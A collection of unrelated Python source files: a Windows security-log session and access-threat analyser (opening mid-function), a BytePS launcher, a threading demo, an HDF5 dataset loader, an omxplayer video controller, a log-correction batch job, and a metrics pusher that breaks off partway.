logonId = logonId[logonId.index('0x'):]
linkedLogonId = (msg[1]).strip('\n')
linkedLogonId = linkedLogonId[linkedLogonId.index('0x'):]
sessionIDs.append([logonId, linkedLogonId])
except:
continue
res = db.getLogDataUsingQuery(storeName, 'Id', ["4634"])
noOfCompleteSessions = 0
for ses in sessionIDs:
found = False
for i in range(0, len(res)):
msg = res[i]['Message']
if msg.__contains__(ses[0]) or msg.__contains__(ses[1]):
noOfCompleteSessions += 1
found = True
break
if found:
print(ses)
print(noOfCompleteSessions)
# def getSessions():
# db
# def jobGetAccessAttackStatus(storeName):
# # LoginSuccess, ObjectReadRequest-success/failure, ObjectReadAccess-success, Logoff-Success
# eventIDs = [4624]
# res = db.getLogDataUsingQuery(storeName, 'Id', eventIDs)
# sessionIds = []
# for r in res:
# if r['Id'] == 4624:
# msg = str(r['Message'])
# msg = msg[msg.index('New Logon'):msg.index('Process Information', msg.index('New Logon'))]
# msg = msg[msg.index('Logon ID'):msg.index('\n', msg.index('Logon ID'))]
# logonid = (re.split('\t', msg)[-1]).strip('\r')
# if logonid not in sessionIds:
# sessionIds.append(logonid)
# threads = []
# print(sessionIds)
# try:
# cnt = 0
# for ses in sessionIds:
# if db.checkCompleteSessionStatus(storeName, ses):
# cnt += 1
# # t = threading.Thread(target=jobGetReadAttackStatus, name='Thread-Ses-' + str(ses), args=(storeName, ses,))
# # threads.append(t)
# except Exception:
# print('Exception :: jobGetAccessAttackStatus :: Making Thread')
#
# print(cnt)
#
# # try:
# # for i in range(0, len(threads)):
# # threads[i].start()
# #
# # for i in range(0, len(threads)):
# # threads[i].join()
# #
# # except Exception:
# # print('Exception :: jobGetAccessAttackStatus :: Run Thread')
#
#
# def jobGetReadAttackStatus(storeName, ses): # 0 - Regular, 1 - Threat, 2 - Attack
# eventIDs = [4624, 4656, 4663, 4647]
# reportId = storeName + '-' + str(datetime.datetime.now()) + '-' + str(ses)
# log = db.getLogsForAnalyze(storeName, ses, eventIDs)
# subLogInStatus = False
# for i in range(1, len(log)-1):
# if log[i]['Id'] == 4656 and log[i]['Keywords'] in [-9218868437227405312, -9218868437227400000]: # No access threat scenario
# if log[i+1]['Id'] != 4656: continue
# countEvt = 0
# objPrev = log[i]['Message']
# objPrev = objPrev[objPrev.index('Object Name') + 12:objPrev.index('\n', objPrev.index('Object Name'))].strip('\t')
# objNext = log[i]['Message']
# objNext = objNext[objNext.index('Object Name') + 12:objNext.index('\n', objNext.index('Object Name'))].strip('\t')
#
# if objPrev != objNext: continue
# sameObjName = 0
# for j in range(i, i+6):
# try:
# objName = log[j]['Message']
# objName = objName[objName.index('Object Name') + 12:objName.index('\n', objName.index('Object Name'))].strip('\t')
# if objPrev == objName: sameObjName += 1
# # print(objName)
# except:
# continue
# if sameObjName == 6:
# for j in range(i, i + 6):
# objName = log[j]['Message']
# objName = objName[objName.index('Object Name') + 12:objName.index('\n', objName.index('Object Name'))].strip('\t')
# userName = log[j]['Message']
# userName = userName[userName.index('Account Name')+13:userName.index('\n', userName.index('Account Name'))].strip('\t')
# userName = str(userName).strip('\r')
# # TODO :: Uncomment Later
# db.insertReport(log[j], 1, reportId, 'Threat: User %s tried to access object %s' % (userName, objName))
# i = i + 6
# elif log[i]['Id'] == 4656 and log[i]['Keywords'] in [-9214364837600034816, -9214364837600030000]: # success access threat scenario
# if log[i+1]['Id'] in [4663, 4656]:
# continue
# else:
# if log[i+1]['Id'] == 4624 and log[i+1]['Keywords'] in [-9214364837600034816, -9214364837600030000]: # Success Admin Login
# subSessionId = log[i+1]['Message']
# subSessionId = subSessionId[subSessionId.index('New Logon:'):subSessionId.index('Linked Logon ID', subSessionId.index('New Logon:'))].strip('\t')
# subSessionId = str(subSessionId).strip('\r')
# subSessionId = re.split('\n', subSessionId)[::-1][1]
# subSessionId = subSessionId.strip('\r').strip('\t')
# subSessionId = re.split('\t', subSessionId)[-1]
# x = i+2
# xCnt = 0
# print('Session ID ', subSessionId)
#
# while log[x]['Id'] not in [4634, 4647]:
# if log[x]['Message'].__contains__('An attempt was made to access an object') and log[x]['Keywords'] in [-9214364837600034816, -9214364837600030000]:
# db.insertReport(log[x], 2, reportId, 'Attack')
# # print('LOL - ', log[x]['Id'])
# # print('LOL - %s' % str(log[x]['Message']))
# else:
# db.insertReport(log[i], 0, reportId, 'Log Clean')
#
# x = x + 1
#
# # print('-----------------')
# # print(log[i]['Message'])
# # print('-----------------')
# # print(log[i+1]['Message'])
# # print('**********************************************')
# elif log[i+1]['Id'] == 4624 and log[i+1]['Keywords'] in [-9218868437227405312, -9218868437227400000]: # Failure Admin Login
# db.insertReport(log[i], 1, reportId, 'Log Clean')
# # print(log[i+1]['Keywords'])
# else:
# # pass
# # TODO :: Uncomment Later
# db.insertReport(log[i], 0, reportId, 'Log Clean')
#
#
#
#
# def jobGetAccLoginAttackStatus(storeName):
# eventIDs = [4648, 4624, 4648]
# print('checking :: ', eventIDs)
#
# if __name__ == '__main__':
# # test()
# jobGetAccessAttackStatus('a2')
|
byteps-tmplauncher.py
|
#!/usr/bin/python
from __future__ import print_function
import os
import subprocess
import threading
import sys
import time
COMMON_REQUIRED_ENVS = ["DMLC_ROLE", "DMLC_NUM_WORKER", "DMLC_NUM_SERVER",
"DMLC_PS_ROOT_URI", "DMLC_PS_ROOT_PORT"]
WORKER_REQUIRED_ENVS = ["DMLC_WORKER_ID"]
def check_env():
assert "DMLC_ROLE" in os.environ and \
os.environ["DMLC_ROLE"].lower() in ["worker", "server", "scheduler"]
required_envs = COMMON_REQUIRED_ENVS
if os.environ["DMLC_ROLE"] == "worker":
assert "DMLC_NUM_WORKER" in os.environ
num_worker = int(os.environ["DMLC_NUM_WORKER"])
assert num_worker >= 1
if num_worker == 1:
required_envs = []
required_envs += WORKER_REQUIRED_ENVS
for env in required_envs:
if env not in os.environ:
print("The env " + env + " is missing")
os._exit(0)
def worker(local_rank, local_size, command):
my_env = os.environ.copy()
my_env["BYTEPS_LOCAL_RANK"] = str(local_rank)
my_env["BYTEPS_LOCAL_SIZE"] = str(local_size)
if int(os.getenv("BYTEPS_ENABLE_GDB", 0)):
if command.find("python") != 0:
command = "python " + command
command = "gdb -ex 'run' -ex 'bt' -batch --args " + command
if os.environ.get("BYTEPS_TRACE_ON", "") == "1":
print("\n!!!Enable profiling for WORKER_ID: %s and local_rank: %d!!!" % (os.environ.get("DMLC_WORKER_ID"), local_rank))
print("BYTEPS_TRACE_START_STEP: %s\tBYTEPS_TRACE_END_STEP: %s\t BYTEPS_TRACE_DIR: %s" % (os.environ.get("BYTEPS_TRACE_START_STEP", ""), os.environ.get("BYTEPS_TRACE_END_STEP", ""), os.environ.get("BYTEPS_TRACE_DIR", "")))
print("Command: %s\n" % command)
sys.stdout.flush()
trace_path = os.path.join(os.environ.get("BYTEPS_TRACE_DIR", "."), str(local_rank))
if not os.path.exists(trace_path):
os.makedirs(trace_path)
subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True)
if __name__ == "__main__":
print("BytePS launching " + os.environ["DMLC_ROLE"])
sys.stdout.flush()
check_env()
if os.environ["DMLC_ROLE"] == "worker":
if "NVIDIA_VISIBLE_DEVICES" in os.environ:
local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(","))
else:
local_size = 1
t = [None] * local_size
for i in range(local_size):
command = ' '.join(sys.argv[1:])
t[i] = threading.Thread(target=worker, args=[i, local_size, command])
t[i].daemon = True
t[i].start()
for i in range(local_size):
t[i].join()
else:
import byteps.server
|
sandhyakal.py
|
'''
Description : Multithreading
Function Date : 14 Mar 2021
Function Author : Prasad Dangare
Input : Int
Output : Int
'''
import os
import threading
from time import sleep
def Thread1(no):
print("Thread1 is created")
print("PID of Thread1 is : ",os.getpid())
for i in range(no):
sleep(1)
print("Thread-1 ",i)
def Thread2(no):
print("Thread2 is created")
print("PID of Thread2 is : ",os.getpid())
for i in range(no):
sleep(1)
print("Thread-2 ",i)
def main():
print("Inside main thread")
print("PID of main process is :",os.getpid())
print("PID of parent process of main is :",os.getppid())
value = 10
t1 = threading.Thread(target = Thread1, args = (value,))
t2 = threading.Thread(target = Thread2, args = (value,))
t1.start()
t2.start()
t1.join()
t2.join()
print("End of main thread")
if __name__ == "__main__":
main()
|
partial_dataset.py
|
"""
Tool for using a dataset which will not fit in memory with neural networks
"""
import math
import queue
import threading
import torch
import time
from torch.utils import data as torch_data
from typing import Callable, List, Iterator, Union
from ...core.communication import MPICommunication
from ...core.communication import MPI_WORLD
__all__ = ["PartialH5Dataset", "PartialH5DataLoaderIter"]
def queue_thread(q: queue.Queue):
while True:
items = q.get()
if isinstance(items, tuple):
func = items[0]
args = items[1:]
func(*args)
else:
items()
q.task_done()
class PartialH5Dataset(torch_data.Dataset):
"""
Create a Dataset object for a dataset which loads portions of data from an HDF5 file. Very similar to
:func:`<heat.utils.data.datatools.Dataset>`. This will create 2 threads, one for loading the data from the target file,
and one for converting items before being passed to the network. The conversion is done by the iterator.
A portion of the data of length ``initial_load`` is loaded upon initialization, the rest of the data is loaded
after the loaded data is returned by :func:`PartialH5DataLoaderIter`. This iterator will be used by the HeAT
:func:`heat.utils.data.datatools.DataLoader` automatically with this type of dataset.
Notes
-----
H5 datasets require the GIL to load data. This can be a bottleneck if data needs to be loaded multiple times (e.g.
the case for using this dataset). It is recommended to find another way to preprocess the data and avoid using
H5 files for this reason.
Parameters
----------
file: str
H5 file to use
comm: MPICommunication
Global MPI communicator generated by HeAT
dataset_names: Union[str, List[str]], optional
Name/s of dataset/s to load from ``file``. If a string is given, it will be the only dataset loaded.
Default is "data".
transforms : List[Callable], optional
Transforms to apply to the data after it is gotten from the loaded data before it is used by the network.
This should be a list of Callable torch functions for each item returned by the ``__getitem__`` function
of the individual dataset. If a list element is ``None`` then no transform will be applied to the
corresponding element returned by ``__getitem__``. I.e. if ``__getitem__`` returns an image and a label
then the list would look like this: ``transforms = [image_transforms, None]``. If this is ``None``, no
transforms will be applied to any elements. Default is ``None``.
use_gpu : bool, optional
Use GPUs if available. Defaults to True.
validate_set : bool, optional
Load the entire dataset onto each node upon initialization and skip loaded in iterator
This is typically the case needed for validation sets when the network should be tested against the whole
dataset. Default is False.
initial_load : int, optional
How many elements to load from the file in the 0th dimension. Default is 7000 elements
load_length : int, optional
How many elements to load from the file in the iterator. Default is 1000 elements
"""
def __init__(
self,
file: str,
comm: MPICommunication = MPI_WORLD,
dataset_names: Union[str, List[str]] = "data",
transforms: List[Callable] = None,
use_gpu: bool = True,
validate_set: bool = False,
initial_load: int = 7000,
load_length: int = 1000,
): # noqa: D107
import h5py
super(PartialH5Dataset, self).__init__()
self.ishuffle = False
self.file = file
self.comm = comm
self.transforms = transforms if isinstance(transforms, (list, tuple)) else [transforms]
self.gpu = True if torch.cuda.device_count() > 0 and use_gpu else False
self.torch_device = "cpu"
if torch.cuda.is_available() and use_gpu:
dev_id = MPI_WORLD.rank % torch.cuda.device_count()
self.torch_device = torch.device("cuda:" + str(dev_id))
torch.cuda.set_device(dev_id)
f = h5py.File(file, "r")
# too much data for the process
fkeys = list(f.keys())
sz = f[fkeys[0]].len()
for k in fkeys[1:]:
# ensure that all of the datasets are the same length
if f[k].len() != sz:
raise ValueError(f"all datasets in {file} must be the same length")
self.total_size = sz
# how many indices will go onto each process (len)
self.lcl_full_sz = sz // comm.size
# load data that is half of of the available memory
self.local_data_start = comm.rank * self.lcl_full_sz
self.local_data_end = (comm.rank + 1) * self.lcl_full_sz
if validate_set or initial_load > self.lcl_full_sz:
# if its the validation set then load the whole dataset for each process
self.lcl_full_sz = sz
self.local_data_start = 0
self.local_data_end = sz
self.load_initial = sz
self.partial_dataset = False
self.load_len = 0
self.loads_needed = 0
else:
self.local_length = self.local_data_end - self.local_data_start
self.load_initial = initial_load
self.load_len = load_length # int(local_data_end / 3)
self.loads_needed = math.ceil(self.lcl_full_sz / self.load_len)
self.partial_dataset = True
self.loads_left = self.loads_needed
self.load_start = self.local_data_start
self.load_end = self.local_data_start + self.load_initial
# data being loaded from dataset_names parameter
if isinstance(dataset_names, str):
dataset_names = [dataset_names]
self.dataset_names = dataset_names
self.dataset_order = []
for d in dataset_names:
hld = f[d][self.load_start : self.load_end]
self.__setattr__(d, hld)
self.load_start = self.load_end
self.load_end += self.load_len
f.close()
self.load_thread = None
self.epoch_end = False
# need the number of loads required for an epoch
self.loading_queue = queue.Queue()
self.loading_condition = threading.Condition()
threading.Thread(target=queue_thread, args=[self.loading_queue], daemon=True).start()
self.convert_queue = queue.Queue()
threading.Thread(target=queue_thread, args=[self.convert_queue], daemon=True).start()
self.used_indices = []
def Shuffle(self):
"""
Send half of the local data to the process ``self.comm.rank + 1`` if available, else wrap around. After
receiving the new data, shuffle the local tensor.
Not implemented for partial dataset
"""
return NotImplementedError
def Ishuffle(self):
"""
Send half of the local data to the process ``self.comm.rank + 1`` if available, else wrap around. After
receiving the new data, shuffle the local tensor.
Not implemented for partial dataset
"""
return NotImplementedError
def __getitem__(self, index: Union[int, slice, List[int], torch.Tensor]) -> torch.Tensor:
"""
This should be defined by the user at runtime. This function needs to be designed such
that the data is in the 0th dimension and the indexes called are only in the 0th dim!
"""
raise NotImplementedError("__getitem__ must be overwritten")
def __len__(self) -> int:
"""
Get the total length of the dataset
"""
return self.total_size
def thread_replace_converted_batches(self):
"""
Replace the elements of the dataset with newly loaded elements. :func:'PartialH5DataLoaderIter' will
put the used indices in the ``used_indices`` parameter. This object is reset to an empty list after
these elements are overwritten with new data.
"""
import h5py
self.loads_left = self.loads_needed
ll = self.loads_left
for _ in range(ll):
with h5py.File(self.file, "r") as f:
for d in self.dataset_names:
hld = f[d][self.load_start : self.load_end]
self.__setattr__("hold" + d, hld)
if self.load_end + self.comm.size > self.total_size:
self.load_end = 0
self.load_start = self.load_end
self.load_end += self.load_len
# wait for lock1 *from* convert thread
with self.loading_condition:
self.loading_condition.wait()
for d in self.dataset_names:
new = self.__getattribute__("hold" + d)
dset = self.__getattribute__(d)
new_top = new[: len(self.used_indices)]
lnew = len(new_top)
dset[self.used_indices[:lnew]] = new_top
self.__setattr__(d, dset)
self.__setattr__("hold" + d, new[lnew:])
# give up lock / notify convert thread
self.used_indices = []
self.loads_left -= 1
class PartialH5DataLoaderIter(object):
"""
Iterator to be used with :func:'PartialH5Dataset'. It closely mirrors the standard torch iterator while loading
new data to replace the loaded batches automatically. It also pre-fetches the batches and begins their
preparation, collation, and device setting in the background.
"""
def __init__(self, loader): # noqa: D107
# todo: make note that h5py is required for this...move load to dataset?
self.dataset = loader.dataset
self._dataset_kind = loader.DataLoader._dataset_kind
self._IterableDataset_len_called = loader.DataLoader._IterableDataset_len_called
self._auto_collation = loader.DataLoader._auto_collation
self._drop_last = loader.DataLoader.drop_last
self._index_sampler = loader.DataLoader._index_sampler
self._num_workers = loader.DataLoader.num_workers
self._pin_memory = loader.DataLoader.pin_memory and torch.cuda.is_available()
self._timeout = loader.DataLoader.timeout
self._collate_fn = loader.DataLoader.collate_fn
self._sampler_iter = iter(self._index_sampler)
self._base_seed = torch.empty((), dtype=torch.int64).random_().item()
self._num_yielded = 0
self.batch_size = loader.DataLoader.batch_size
self.comm = self.dataset.comm
rand_samp_list = torch.randperm(self.dataset.load_initial).tolist()
# todo: support other samplers: for now its only random
if self.dataset.partial_dataset:
self.ready_batches = []
mod_batch = self.dataset.load_len % self.batch_size
if mod_batch != 0:
self.dataset.load_len += self.batch_size - mod_batch
self.dataset.load_end = self.dataset.load_start + self.dataset.load_len
# generate all indices
index_list = []
idx_repeats = math.ceil(self.dataset.lcl_full_sz / self.dataset.load_initial)
for _ in range(idx_repeats):
index_list.extend(torch.randperm(self.dataset.load_initial).tolist())
# start the conversion
self.dataset.convert_queue.put((self.__thread_convert_all, index_list))
self.length = len(index_list) // self.batch_size
self.dataset.loading_queue.put(self.dataset.thread_replace_converted_batches)
else:
self.rand_samp_list = rand_samp_list
self.length = len(self._index_sampler)
self._dataset_fetcher = torch_data.dataloader._DatasetKind.create_fetcher(
self._dataset_kind,
loader.DataLoader.dataset,
self._auto_collation,
self._collate_fn,
self._drop_last,
)
def __len__(self):
"""
Get the length of the iterator
"""
return self.length
def _next_data(self):
# get the next batch
if not self.dataset.partial_dataset:
index = next(self._sampler_iter) # may raise StopIteration
data = self._dataset_fetcher.fetch(index) # may raise StopIteration
if self._pin_memory:
data = torch_data._utils.pin_memory.pin_memory(data)
return data
if self._num_yielded == self.__len__():
raise StopIteration
while len(self.ready_batches) < 1:
time.sleep(0.1)
batch = self.ready_batches.pop(0)
for b in range(len(batch)):
if batch[b].device != self.dataset.torch_device:
batch[b] = batch[b].to(self.dataset.torch_device)
return batch
def __next__(self):
"""
Get the next batch of data. Shamelessly taken from torch.
"""
# shamelessly taken from torch
data = self._next_data()
self._num_yielded += 1
# note: the warnings raised by torch for iterable datasets were removed here, look for these in
# the base class of the single process iterator
return data
def __iter__(self):
"""
Get a new iterator of this class
Returns
-------
PartialH5DataLoaderIter
"""
return self
def __thread_convert_all(self, index_list):
# convert all of the elements, collate them into batches, and send the batches to the correct device
# this function als communicates with the data loading thread from the PartialH5Dataset to notify it
# when it has the correct amount of data to write.
converted_items = []
for ind in index_list:
# get the desired image/target/... to begin composing a batch
single_item = self.dataset[ind]
if not isinstance(single_item, tuple) and self.dataset.transforms[0] is not None:
single_item = self.dataset.transforms[0](single_item)
if isinstance(single_item, tuple):
single_item = list(single_item)
for ii in range(len(single_item)):
# do transforms (have all torch stuff here)
if self.dataset.transforms[ii] is not None:
single_item[ii] = self.dataset.transforms[ii](single_item[ii])
converted_items.append(single_item)
self.dataset.used_indices.append(ind)
if len(converted_items) == self.batch_size:
if (
len(self.dataset.used_indices) == self.dataset.load_len
and self.dataset.loads_left > 0
):
with self.dataset.loading_condition:
self.dataset.loading_condition.notify()
batch = self._collate_fn(converted_items)
try:
for bb in range(2):
bb_batch = self.ready_batches[bb]
for b in range(len(batch)):
bb_batch[b] = bb_batch[b].to(self.dataset.torch_device)
self.ready_batches[bb] = bb_batch
except IndexError:
pass
self.ready_batches.append(batch)
converted_items = []
|
Video.py
|
# -*- coding: utf-8 -*-
# Copyright 2018-2019 oscillo
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software
# and associated documentation files (the "Software"),
# to deal in the Software without restriction,
# including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission
# notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY
# OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
# LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import time
import subprocess
import os
import threading
import dbus
class Video:
def __init__(self):
# [[[ 1. Check ALSA Device ]]]
aplay = subprocess.Popen(
"aplay -L",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'LANG':'C'},
shell=True
)
out, err = aplay.communicate()
aplayLines = out.decode("ascii", "ignore").splitlines()
self.alsa = False # True: Exist ALSA Device, False: Not Exist
for line in aplayLines:
if -1 != line.find("sndrpijustboomd"): # JustBoom DAC HAT
self.alsa = True
break;
# [[[ 2. Initialize ]]]
# omxplayer command line
if False == self.alsa:
self.start = "omxplayer --no-osd -b -o hdmi --vol "
else:
self.start = "omxplayer --no-osd -b -o alsa:plughw:1,0 --vol "
self.proc = None # omxplayer process
self.stopThread = None # stop thread
# Get HDMI or RCA
def GetCurrentAudioPort(self): # String (HDMI or RCA)
# [[[ 1. Check HW ]]]
if False is self.alsa:
return "HDMI"
# [[[ 2. Check command line ]]]
if 0 < self.start.find("alsa"):
return "RCA"
else:
return "HDMI"
# Set HDMI or RCA
def SetCurrentAudioPort(
self, # instance
port # "HDMI" or "RCA"
): # None
# [[[ 1. Check HW ]]]
if False is self.alsa:
return
# [[[ 2. Set command line ]]]
if 0 == port.find("HDMI"):
self.start = "omxplayer --no-osd -b -o hdmi --vol "
else:
self.start = "omxplayer --no-osd -b -o alsa:plughw:1,0 --vol "
# Open and Playing Video
def Open(self,path,vol,audioNum, audioIndex) : # None
# [[[ 1. Make playing command ]]]
command = \
self.start \
+ str(vol) \
+ " -n " + str(audioIndex) + " \"" \
+ path + "\""
# [[[ 2. Execute for playing ]]]
self.proc = subprocess.Popen( \
command, \
shell=True, \
stdin=subprocess.PIPE)
# [[[ 3. Initialize Audio Stream Switching ]]]
self.audioNum = audioNum
self.audioStream = audioIndex - 1
self.vol = vol
# [[[ 4. D-Bus ]]]
flag = True
while True == flag:
try:
while False == os.path.exists("/tmp/omxplayerdbus.root"):
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return
time.sleep(0.05)
time.sleep(0.05)
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return
dbusAddress = open("/tmp/omxplayerdbus.root", "r")
self.bus = dbus.bus.BusConnection(dbusAddress.readline()[0:-1])
dbusAddress.close()
self.proxy = self.bus.get_object(
'org.mpris.MediaPlayer2.omxplayer',
'/org/mpris/MediaPlayer2',
introspect=False)
self.root_interface = dbus.Interface(
self.proxy,
'org.mpris.MediaPlayer2')
self.player_interface = dbus.Interface(
self.proxy,
'org.mpris.MediaPlayer2.Player')
self.properties_interface = dbus.Interface(
self.proxy,
'org.freedesktop.DBus.Properties')
flag = False
except:
pass
# Check playing is done
def CheckPlaying(self) : # Bool True(Playing) / False(Stop)
if self.proc is not None:
# < omxplayer is running >
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return False
else:
# < omxplayer is running >
return True
else:
# < omxplayer is not running >
return False
# Fade Stop Playing Video
def FadeStopThread(self) : # None
try:
# < omxplayer is running >
# [[[ 1. volume down ]]]
for i in range(15):
self.DownVolume()
time.sleep(0.2)
# [[[ 2. exit omxplayer ]]]
self.root_interface.Quit()
# [[[ 3. Terminate omxplayer ]]]
self.proc = None
except:
pass
# Stop Playing Video
def Stop(self) : # None
# [[[ 1. Create tread that has sleep ]]]
self.stopThread = threading.Thread(target=self.FadeStopThread)
self.stopThread.start()
# Pause Video
def Pause(self) : # None
try:
self.player_interface.PlayPause()
except:
pass
# Switch Audio
def SwitchAudio(self) : # None
# [[[ 1. Check audio number ]]]
if 1 == self.audioNum:
return
# [[[ 2. Change audio stream ]]]
self.audioStream = self.audioStream + 1
if self.audioNum == self.audioStream:
# [[ 2.1. back audio stream ]]
self.audioStream = 0
try:
self.player_interface.SelectAudio(self.audioStream)
# [[[ 3. Seek for change audio immediately ]]]
self.player_interface.Seek(dbus.types.Int64(1))
except:
pass
# Position
def Position(self) : # [sec]
return int(self.properties_interface.Get(
self.player_interface.dbus_interface,
"Position"
) / 1000000)
# Rewind
def Rewind(self) : # None
try:
self.player_interface.Seek(dbus.types.Int64(1000*1000*(-5)))
except:
pass
# Fast Forward
def FastForward(self) : # None
try:
self.player_interface.Seek(dbus.types.Int64(1000*1000*(5)))
except:
pass
# Down Volume
def DownVolume(self) : # None
self.vol = self.vol - 300
try:
self.properties_interface.Set(
self.player_interface.dbus_interface,
"Volume",
pow(10,self.vol/2000.0)
)
except:
pass
# Up Volume
def UpVolume(self) : # None
self.vol = self.vol + 300
try:
self.properties_interface.Set(
self.player_interface.dbus_interface,
"Volume",
pow(10,self.vol/2000.0)
)
except:
pass
# Default Volume
def GetDefaultVolume(self): # Integer [dB]
return -4500
|
corrector_batch.py
|
import multiprocessing
import queue
import time
import traceback
from . import database_manager
from . import document_manager
from .corrector_worker import CorrectorWorker
from .logger_manager import LoggerManager
class CorrectorBatch:
def __init__(self, settings):
self.settings = settings
def run(self, process_dict):
"""
The run method fetches data and initializes corrector workers.
:param process_dict:
:return:
"""
try:
self._batch_run(process_dict)
except Exception as e:
# Catch internal exceptions to log
logger_m = LoggerManager(self.settings.LOGGER_NAME, self.settings.MODULE)
msg = "Error: {0} {1}".format(repr(e), traceback.format_exc()).replace("\n", "")
logger_m.log_error('corrector_batch_run', msg)
# Raise exception again
raise e
def _batch_run(self, process_dict):
"""
Gets raw documents, groups by "messageId", corrects documents' structure, initializes workers,
updates timeout documents to "done", removes duplicates from raw_messages.
:param process_dict:
:return: Returns the amount of documents still to process.
"""
doc_len = 0
start_processing_time = time.time()
logger_m = LoggerManager(self.settings.LOGGER_NAME, self.settings.MODULE)
logger_m.log_heartbeat(
"processing", self.settings.HEARTBEAT_LOGGER_PATH, self.settings.HEARTBEAT_FILE, "SUCCEEDED")
logger_m.log_info('corrector_batch_start', 'Starting corrector - Version {0}'.format(LoggerManager.__version__))
# Start Database Manager
db_m = database_manager.DatabaseManager(self.settings)
# Start Document Manager
doc_m = document_manager.DocumentManager(self.settings)
# Get documents from raw collection
cursor = db_m.get_raw_documents(limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
logger_m.log_info('corrector_batch_raw', 'Processing {0} raw documents'.format(len(cursor)))
# Aggregate documents by message id
# Correct missing fields
doc_map = {}
for _doc in cursor:
message_id = _doc.get('messageId', '')
if message_id not in doc_map:
doc_map[message_id] = []
fix_doc = doc_m.correct_structure(_doc)
doc_map[message_id].append(fix_doc)
# Build queue to be processed
list_to_process = multiprocessing.Queue()
duplicates = multiprocessing.Value('i', 0, lock=True)
m = multiprocessing.Manager()
to_remove_queue = m.Queue()
for message_id in doc_map:
documents = doc_map[message_id]
data = dict()
data['logger_manager'] = logger_m
data['document_manager'] = doc_m
data['message_id'] = message_id
data['documents'] = documents
data['to_remove_queue'] = to_remove_queue
list_to_process.put(data)
doc_len += len(documents)
# Sync
# time.sleep(5)
# Create pool of workers
pool = []
for i in range(self.settings.THREAD_COUNT):
# Configure worker
worker = CorrectorWorker(self.settings, 'worker_{0}'.format(i))
p = multiprocessing.Process(target=worker.run, args=(list_to_process, duplicates))
pool.append(p)
# Starts all pool process
for p in pool:
p.start()
# Wait all processes to finish their jobs
for p in pool:
p.join()
logger_m.log_info('corrector_batch_update_timeout',
"Updating timed out [{0} days] orphans to done.".format(self.settings.CORRECTOR_TIMEOUT_DAYS))
# Update Status of older documents according to client.requestInTs
cursor = db_m.get_timeout_documents_client(self.settings.CORRECTOR_TIMEOUT_DAYS,
limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
list_of_docs = list(cursor)
number_of_updated_docs = db_m.update_old_to_done(list_of_docs)
if number_of_updated_docs > 0:
logger_m.log_info('corrector_batch_update_client_old_to_done',
"Total of {0} orphans from Client updated to status 'done'.".format(number_of_updated_docs))
else:
logger_m.log_info('corrector_batch_update_client_old_to_done',
"No orphans updated to done.")
doc_len += number_of_updated_docs
# Update Status of older documents according to producer.requestInTs
cursor = db_m.get_timeout_documents_producer(self.settings.CORRECTOR_TIMEOUT_DAYS,
limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
list_of_docs = list(cursor)
number_of_updated_docs = db_m.update_old_to_done(list_of_docs)
if number_of_updated_docs > 0:
logger_m.log_info('corrector_batch_update_producer_old_to_done',
"Total of {0} orphans from Producer updated to status 'done'.".format(number_of_updated_docs))
else:
logger_m.log_info('corrector_batch_update_producer_old_to_done',
"No orphans updated to done.")
doc_len += number_of_updated_docs
# Go through the to_remove list and remove the duplicates
element_in_queue = True
total_raw_removed = 0
while element_in_queue:
try:
element = to_remove_queue.get(False)
db_m.remove_duplicate_from_raw(element)
total_raw_removed += 1
except queue.Empty:
element_in_queue = False
if total_raw_removed > 0:
logger_m.log_info('corrector_batch_remove_duplicates_from_raw',
"Total of {0} duplicate documents removed from raw messages.".format(total_raw_removed))
else:
logger_m.log_info('corrector_batch_remove_duplicates_from_raw',
"No raw documents marked to removal.")
doc_len += total_raw_removed
end_processing_time = time.time()
total_time = time.strftime("%H:%M:%S", time.gmtime(end_processing_time - start_processing_time))
msg = ["Number of duplicates: {0}".format(duplicates.value),
"Documents processed: " + str(doc_len),
"Processing time: {0}".format(total_time)]
logger_m.log_info('corrector_batch_end', ' | '.join(msg))
logger_m.log_heartbeat(
"finished", self.settings.HEARTBEAT_LOGGER_PATH, self.settings.HEARTBEAT_FILE, "SUCCEEDED")
process_dict['doc_len'] = doc_len
|
vegaops2n9e.py
|
# -*- coding: UTF-8 -*-
import json
import logging
import os
import re
import requests
import schedule
import sys
import threading
import time
import yaml
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('VegaOps2N9e')
reload(sys)
sys.setdefaultencoding('utf8')
def _push_metrics(cfg, metrics):
headers = {
"X-User-Token": cfg.get('token'),
"Content-Type": "Application/json"
}
url = cfg.get('url', {}).get('base')
if not url:
raise Exception("N9E URL could not be empty.")
uri = url + '/api/transfer/push'
resp = requests.post(uri, headers=headers, data=json.dumps(metrics))
if resp.status_code not in [200, 201]:
logger.error(resp.text)
raise Exception("Bad request status[%s] for "
"%s" % (resp.status_code, uri))
cont = resp.json()
if cont.get('err'):
logger.error(resp.text)
def _register_resource(cfg, resource):
headers = {
"X-User-Token": cfg.get('token'),
"Content-Type": "Application/json"
}
url = cfg.get('url', {}).get('rdb')
if not url:
raise Exception("N9E URL could not be empty.")
uri = url + '/v1/rdb/resources/register'
resp = requests.post(uri, headers=headers, data=json.dumps(resource))
if resp.status_code not in [200, 201]:
logger.error(resp.text)
raise Exception("Bad request status[%s] for "
"%s" % (resp.status_code, uri))
